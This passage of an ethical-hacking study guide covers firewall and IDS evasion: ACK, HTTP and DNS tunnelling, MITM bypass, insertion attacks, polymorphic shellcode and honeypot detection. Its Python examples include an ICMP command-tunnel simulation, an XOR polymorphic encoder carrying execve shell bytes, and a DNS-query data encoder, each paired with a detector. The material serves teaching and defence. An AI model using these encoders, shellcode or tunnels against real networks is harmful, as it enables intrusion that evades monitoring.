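def looks_like_standard_ping(data):
    """Perimeter check: does the echo data match what common ping tools send?
    Windows: a fixed 32-byte alphabet. iputils: 56 bytes where every byte
    after the timestamp equals its own offset. Anything else deserves a look."""
    if data == WINDOWS_PING_DATA:
        return True
    return len(data) == 56 and all(data[i] == i for i in range(16, 56))


def demo():
    handlers = {b"id": b"uid=0(root) gid=0(root)"}      # constructed
    req = tunnel_request(b"id")
    reply = tunnel_server(req, handlers)
    linux_ping = build_echo(ECHO_REQUEST, 1, 1, bytes(16) + bytes(range(16, 56)))
    return {"output": tunnel_client_read(reply),
            "tunnel_flagged": not looks_like_standard_ping(parse_echo(req)["data"]),
            "ping_flagged": not looks_like_standard_ping(parse_echo(linux_ping)["data"]),
            "server_answers_real_ping": tunnel_server(linux_ping, handlers) is not None}
```

The payload check is deliberately strict: it whitelists the two payloads most pings actually carry, so a tunnel that copies one of them byte for byte would still pass, which is why rate limits and a stateful echo request/reply match remain necessary alongside it.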
Bypassing a firewall through the ACK tunneling method
ACK tunneling carries a backdoor application's traffic in TCP packets with the ACK bit set. The
ACK bit acknowledges receipt of data, so ACK-only packets normally belong to a connection that was
already allowed through. Stateless packet filters often pass any packet with the ACK bit set for
that reason, and ACK tunneling exploits this with tools such as AckCmd. A stateful firewall,
which only passes ACK packets that belong to a connection it has seen established, is not fooled.
Bypassing a firewall through the HTTP tunneling method
HTTP tunneling can be used if the target company has a public Web server whose port 80 is
unfiltered on the firewall. Many firewalls do not examine the payload of an HTTP packet to confirm
that it is legitimate HTTP traffic, so other traffic can be tunneled inside TCP port 80 because
that port is already allowed. Tools such as HTTPTunnel tunnel traffic across TCP port 80 in this
way. HTTPTunnel is a client/server application: the client is htc and the server is hts. The
server is uploaded to the target system and told which local port to redirect through TCP port 80.
Bypassing a firewall through external systems
Bypassing a firewall through external systems includes the following steps:
1. A legitimate user works from an external system to access the corporate network.
2. The attacker sniffs the network traffic and steals the user's session ID and cookies.
3. Using them, the attacker reaches the corporate network through the firewall and obtains the
window ID of the Netscape 4.x/Mozilla process running on the user's system.
4. The attacker issues an openURL() command to that window.
5. The user's Web browser connects to the attacker's WWW server.
6. The attacker inserts a malicious payload into the requested Web page, and the attacker's code
is executed on the user's machine.
Bypassing a firewall through the MITM attack
Bypassing a firewall through the MITM attack includes the following steps:
1. The attacker poisons the corporate DNS server.
2. User 1 asks the corporate DNS server for www.ucertify.com.
3. The corporate DNS server answers with the attacker's IP address.
4. User 1 connects to the attacker's malicious server.
5. The attacker connects to the real host and relays (tunnels) the user's HTTP traffic through it.
6. The attacker inserts a malicious payload into the requested Web page, and the attacker's code
is executed on the user's machine.
Insertion attack
In an insertion attack the IDS accepts a packet that the end host rejects. The IDS assumes the
host will accept it too and adds its contents to the stream it is reconstructing, but the host
discards it (because of a bad checksum, an expiring TTL, or some other property the IDS failed to
check). The attacker uses this to split a signature: the extra bytes, inserted only into the IDS's
view, break the pattern, so the IDS's reconstructed stream looks harmless while the host receives
the complete attack. Insertion attacks succeed when a NIDS is less strict than the end hosts in
deciding which packets to accept. (The mirror image is the evasion attack, in which the IDS
rejects a packet that the host accepts.)
Polymorphic shell code attack
In a polymorphic shellcode attack the attacker sends malicious code whose byte pattern changes
from one copy to the next: the payload is encoded (typically XOR-ed with a random key) and a small
decoder stub restores it at run time. Because no fixed signature describes every copy, a
signature-based IDS fails to match the payload, and the decoded code then does the damage on the
host.
ADMutate
ADMutate (by K2) is a tool that generates polymorphic shellcode for buffer overflow exploits. It
transforms the attacker's shellcode, varying the NOP sled, the encoded body and the decoder, so
that the result does not match existing IDS signatures. When the transformed code reaches the
target, the decoder stub reassembles the original shellcode in memory and executes it.
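The two ingredients of polymorphic shellcode, a per-copy XOR key and a sled of NOP-equivalent instructions, together with the detector that the countermeasures list later recommends ("look for NOP opcodes other than 0x90"), as an added example (not ADMutate's code and not from the page; SHELLCODE is a constructed stand-in, and the decoder is shown as a Python function rather than the x86 stub that would precede the payload on the wire):

```python
"""Polymorphic shellcode, simplified to its two ingredients: the body is
XOR-encoded with a fresh key for each copy, so its bytes (and any
signature over them) change every time, and the NOP sled is built from
single-byte instructions other than 0x90. Added example; SHELLCODE is a
constructed stand-in, the decoder is shown in Python rather than as the
x86 stub that would precede the payload on the wire, and the sled detector
implements the 'look for NOP opcodes other than 0x90' countermeasure."""
import random

# Constructed stand-in for a Linux/x86 execve("/bin//sh") payload.
SHELLCODE = b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# Constructed IDS signature keyed on the "/bin" string pushed by that payload.
SIGNATURE = b"/bin"
# Single-byte x86 instructions that leave the registers the payload cares
# about alone: nop, inc/dec ecx edx ebx esi edi, cwtl, clc, stc, cld.
NOP_EQUIVALENTS = frozenset([0x90, 0x41, 0x42, 0x43, 0x46, 0x47, 0x49, 0x4A,
                             0x4B, 0x4E, 0x4F, 0x98, 0xF8, 0xF9, 0xFC])


def xor_encode(payload, key):
    """key is one byte (1..255); 0 would leave the payload unchanged."""
    if not 1 <= key <= 255:
        raise ValueError("key must be 1..255")
    return bytes(b ^ key for b in payload)


def xor_decode(encoded, key):
    """What the decoder stub does at run time: XOR is its own inverse."""
    return xor_encode(encoded, key)


def random_sled(length, rng, avoid_0x90=True):
    """NOP sled drawn from NOP_EQUIVALENTS; leaving out 0x90 defeats a
    detector that only looks for runs of 0x90."""
    choices = sorted(NOP_EQUIVALENTS - ({0x90} if avoid_0x90 else set()))
    return bytes(rng.choice(choices) for _ in range(length))


def make_variant(payload, sled_len=32, rng=None):
    """One polymorphic copy: random sled + random key + encoded body."""
    rng = rng or random.SystemRandom()
    key = rng.randrange(1, 256)
    sled = random_sled(sled_len, rng)
    body = xor_encode(payload, key)
    return {"key": key, "sled": sled, "body": body, "wire": sled + body}


def signature_hits(buf):
    return SIGNATURE in buf


def naive_sled_detector(buf, min_run=8):
    """Looks only for runs of 0x90."""
    return b"\x90" * min_run in buf


def sled_detector(buf, min_run=8):
    """Looks for a run of min_run consecutive NOP-equivalent bytes."""
    run = 0
    for b in buf:
        run = run + 1 if b in NOP_EQUIVALENTS else 0
        if run >= min_run:
            return True
    return False


def demo(seed=1):
    rng = random.Random(seed)
    a, b = make_variant(SHELLCODE, rng=rng), make_variant(SHELLCODE, rng=rng)
    return {"copies_differ": a["wire"] != b["wire"],
            "signature_on_plain": signature_hits(SHELLCODE),
            "signature_on_wire": signature_hits(a["wire"]) or signature_hits(b["wire"]),
            "decodes_back": xor_decode(a["body"], a["key"]) == SHELLCODE,
            "naive_detector": naive_sled_detector(a["wire"]),
            "nop_equivalent_detector": sled_detector(a["wire"])}
```

Real polymorphic engines also vary the decoder stub itself, which is why the sled and the decoder, not the encoded body, are what detection has to key on.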
Detect honeypots
Attackers can probe the services running on a system to determine whether it is a honeypot.
Crafted probes typically target the following services:
- HTTP over SSL (HTTPS)
- SMTP over SSL (SMTPS)
- IMAP over SSL (IMAPS)
Send-Safe Honeypot Hunter, Nessus, and hping are tools that can be used to probe for honeypots. A
port that appears to have a service running but refuses to complete the three-way handshake is a
sign of a honeypot.
Send-Safe Honeypot Hunter
Send-Safe Honeypot Hunter is a tool used to check list of HTTPS and SOCKS proxies for
honeypots. The following are features of Send-Safe Honeypot Hunter:
- It checks lists of HTTPS, SOCKS4, and SOCKS5 proxies on any port.
- It checks several remote or local proxy lists at once.
- It can upload "Valid proxies" and "All except honeypots" files to FTP.
- It can process proxy lists automatically at a specified interval.
- It can be used to validate an ordinary proxy list.
tcp-over-dns
tcp-over-dns consists of a special DNS server and a special DNS client that work together to
provide a TCP tunnel over the standard DNS protocol: outbound data is encoded into DNS queries and
inbound data into the responses, so the tunnel passes any firewall that lets DNS through.
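The encoding step such a tunnel depends on, data carried in the labels of query names under the attacker's zone, plus the length/entropy check a resolver log can be run through, as an added example (not tcp-over-dns's code and not from the page; the zone name and the sample payload are constructed, nothing is resolved, and the detector thresholds are illustrative):

```python
"""DNS tunnelling, the carrier tcp-over-dns uses: outbound bytes are
base32-encoded into the labels of query names under a zone the attacker
controls; the authoritative server decodes them and pushes data back in its
answers. Added example: the zone name is constructed, nothing is resolved,
and the detector is a simple length/entropy heuristic, not a product rule."""
import base64
import math

TUNNEL_ZONE = "t.example.net"        # constructed: attacker's authoritative zone
MAX_LABEL, MAX_NAME = 63, 253         # DNS limits: per label, per name


def encode_queries(data, zone=TUNNEL_ZONE, labels_per_query=3):
    """Chunk data into query names of the form s<seq>.<b32>.<b32>.<b32>.<zone>.
    base32 keeps the names within the hostname character set."""
    chars = base64.b32encode(data).decode().rstrip("=").lower()
    per_query = MAX_LABEL * labels_per_query
    names = []
    for seq, i in enumerate(range(0, len(chars), per_query)):
        chunk = chars[i:i + per_query]
        labels = [chunk[j:j + MAX_LABEL] for j in range(0, len(chunk), MAX_LABEL)]
        name = ".".join(["s%d" % seq] + labels + [zone])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_queries(names, zone=TUNNEL_ZONE):
    """Server side: keep queries for our zone, order them by sequence
    label, join the payload labels and base32-decode."""
    suffix = "." + zone
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[:-len(suffix)].split(".")
        pieces[int(labels[0][1:])] = "".join(labels[1:])
    chars = "".join(pieces[k] for k in sorted(pieces))
    chars += "=" * (-len(chars) % 8)
    return base64.b32decode(chars, casefold=True)


def subdomain(name, zone):
    suffix = "." + zone
    return name[:-len(suffix)] if name.endswith(suffix) else name


def entropy(s):
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def looks_like_tunnel(name, zone=TUNNEL_ZONE, max_len=40, min_entropy=3.0):
    """Normal hostnames are short and low-entropy; tunnel labels are long
    and near-random. Thresholds are illustrative."""
    sub = subdomain(name, zone).replace(".", "")
    return len(sub) > max_len and entropy(sub) > min_entropy


# Constructed payload standing in for the first bytes of a tunnelled TCP stream.
SAMPLE = b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n" + bytes(range(256))


def demo():
    names = encode_queries(SAMPLE)
    return {"queries": len(names), "roundtrip": decode_queries(names) == SAMPLE,
            "all_flagged": all(looks_like_tunnel(n) for n in names),
            "benign_flagged": looks_like_tunnel("www.t.example.net")}
```

Each query carries at most about 118 bytes here (189 base32 characters), which is why DNS tunnels are slow and chatty; the volume of unusual queries to one zone is usually the stronger signal than any single name.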
16.5 Identify firewall evading tools
Exam Focus: Identify firewall evading tools. Objective includes:
- Identify firewall evading tools.
- Analyze a firewall and IDS penetration testing.
Firewall evasion tools
The following are firewall evasion tools:
- Snare Agent
- Atelier Web Firewall Tester
- AckCmd
- Tomahawk
- Your Freedom
- TCPOpera
- Covert TCP
- Traffic IQ Gateway
Packet fragment generators
The following are packet fragment generators:
- Blast
- MGEN Toolset
- Ettercap
- Net::RawIP
- hping2
- SING
- Libnet
- Nconvert
Fragroute is a tool that fragments packets before transmission. It can intercept, modify, or
rewrite traffic destined for a specific host and can perform fragmentation, overlap, overwrite
and similar manipulations. It is used to test IDSs and firewalls for these weaknesses, and by
attackers to evade them, since fragmented traffic often bypasses IDSs and firewalls that do not
reassemble it the way the target host does.
Countermeasures taken while using an IDS and a firewall
The following countermeasures are taken while using an IDS and a firewall:
- Administratively shut down the switch port of a system from which attacks are being launched.
- To defend against polymorphic shellcode, look for NOP-equivalent opcodes other than 0x90
(single-byte instructions such as inc/dec register), not just for runs of 0x90.
- Perform bifurcating analysis: when the monitor meets an ambiguous traffic stream, it
instantiates a separate analysis thread for each possible interpretation of the ambiguity.
- Keep up with security vulnerability announcements, and choose the IDS on the basis of the
network topology and the traffic it will see.
- Generate TCP RST packets to tear down malicious TCP sessions, and answer malicious UDP traffic
with one of the available ICMP error packets.
- Interact with the external firewall or router to add a general rule blocking all communication
from offending IP addresses or entire networks.
- Deploy a traffic normalizer, which rewrites ambiguous packets (overlapping fragments, bad
checksums, odd TTLs) into one canonical form before they reach the IDS and the hosts.
- Make sure the IDS reassembles fragmented packets and puts them back in the proper order, so
that it looks at the data exactly as the end host will see it.
- Update the IDS and firewall software regularly.
- Configure the IDS to discard packets whose TTL is too small to reach the protected hosts (a
minimum-TTL setting, or a normalizer that rewrites low TTLs upward). Then any fragment the IDS
sees is guaranteed to reach the end host as well, and the attacker can no longer slip decoy
fragments to the IDS that expire before the host receives them.
Firewall/IDS penetration testing
Firewall/IDS penetration testing is needed for the following reasons:
- Checking whether the firewall/IDS properly enforces the organization's firewall/IDS policy
- Checking whether the firewall/IDS and the components within the network properly enforce the
organization's network security policy
- Determining how well the firewall/IDS protects against externally initiated attacks
- Checking the effectiveness of the network's security perimeter
- Checking how much information about the network is available from outside it
- Checking the firewall/IDS for potential security breaches that could be exploited
- Evaluating whether the firewall/IDS rules correspond to the actions they actually perform
- Verifying whether the security policy is correctly enforced by the sequence of firewall/IDS
rules
Firewall penetration testing
Take the following steps for firewall penetration testing:
1. Gain unauthorized access to a computer or a network by performing IP address spoofing.
2. Perform a fragmentation attack in order to force the TCP header information into the next
fragment to bypass the firewall.
3. Use proxy servers that block the actual IP address and display another thereby allowing
access to the blocked Website.
4. Perform ICMP tunneling in order to tunnel a backdoor application in the data portion of
ICMP echo packets.
5. Perform ACK tunneling using tools such as AckCmd to tunnel backdoor application with
TCP packets with the ACK bit set.
IDS penetration testing
Take the following steps for IDS penetration testing:
1. Encode attack packets that the IDS will not detect but an IIS Web server will decode and
become attacked by using the obfuscating technique.
2. Use a false positive generation technique in order to create a good deal of log noise to
blend real attacks with the false.
3. Perform the session splicing technique to stop the IDS by keeping the session active
longer than the IDS will spend on reassembling it.
4. Perform the Unicode evasion technique in order to evade IDS as it is possible to have
multiple representations of a single character.
5. Perform the fragmentation attack, exploiting an IDS fragment reassembly timeout that is
shorter than the victim's.
6. Perform the overlapping fragment technique: craft a series of TCP segments with overlapping
sequence numbers so that the IDS and the host reassemble different data.
7. Perform the invalid RST packets technique in order to evade detection by sending RST
packets with an invalid checksum that causes an IDS to stop processing the stream.
8. Perform the urgency flag evasion technique in order to evade IDSs as some IDSs do not
consider the TCP protocol's urgency feature.
9. Perform the polymorphic shellcode technique in order to hide the shellcode by encrypting
it in a simplistic form.
10. Perform the ASCII shellcode technique in order to bypass IDS pattern matching
signatures as strings are hidden within the shellcode as in a polymorphic shellcode.
11. Perform application layer attacks as many IDSs will have no way to check the
compressed file format for signatures.
12. Set up an encrypted session with the victim or send loads of unnecessary traffic to
produce noise that cannot be analyzed by the IDS.
Chapter Summary
In this chapter, we learned about Intrusion Detection Systems, ways to detect an intrusion, and
various types of Intrusion Detection Systems. This chapter focused on firewalls, types of
firewalls, honeypots, and types of honeypots. This chapter also covered firewall evading tools
and firewall and IDS penetration testing.
Glossary
ADMutate
ADMutate is a tool that generates polymorphic shellcode so that buffer overflow exploits do not
match signature-based IDS rules.
Demilitarized zone
A demilitarized zone (DMZ) is a physical or logical subnetwork that contains and exposes
external services of an organization to a larger network, usually the Internet.
Evasion attack
An evasion attack is one in which an IDS rejects a malicious packet but the host computer
accepts it.
Firewall
A firewall is a combination of software and hardware that prevents data packets from coming in
or going out of a specified network or computer.
Fragroute
Fragroute is a tool used for fragmenting packets before transmission.
HIDS
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors
and analyzes the internals of a computing system rather than the network packets on its external
interfaces.
Honeypot
A honeypot is used to gain information about the intruders and their attack strategies.
Intrusion Detection System
An Intrusion Detection System (IDS) is used to detect unauthorized attempts at accessing and
manipulating computer systems locally, through the Internet or through an intranet.
KFSensor
KFSensor is a Windows-based honeypot Intrusion Detection System.
NIDS
A network intrusion detection system (NIDS) is an intrusion detection system that tries to detect
malicious activity, such as denial of service attacks, port scans or even attempts to crack into
computers by monitoring network traffic.
PIDS
A protocol-based intrusion detection system (PIDS) is an intrusion detection system, which is
typically installed on a Web server, and is used in the monitoring and analysis of the protocol in
use by the computing system.
Snort
Snort is a network sniffer and intrusion detection system. It logs the network activity that
matches its predefined signatures. Signatures can be written for a wide range of traffic,
including Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol
(UDP), and Internet Control Message Protocol (ICMP).
Stateful firewall
A stateful firewall is a firewall that keeps track of the state of network connections (such as TCP
streams, UDP communication) traveling across it.
Tripwire
Tripwire is a System Integrity Verifier (SIV) that is used to monitor files and detect changes
made by an intruder.